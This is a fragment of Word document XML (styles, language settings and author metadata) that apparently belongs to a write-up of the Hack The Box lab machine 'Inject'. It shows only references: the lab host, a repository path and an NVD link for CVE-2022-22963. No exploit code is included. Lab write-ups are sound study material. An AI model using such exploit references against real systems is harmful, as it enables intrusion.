    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00404F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val="en-ZA" w:eastAsia="en-Z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04FA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inject.htb:8080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e2nuk/CVE-2022-22963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nvd.nist.gov/vuln/detail/CVE-2022-22963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976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cayetana vt</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>cayetana vt</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-28T10:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-28T10:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>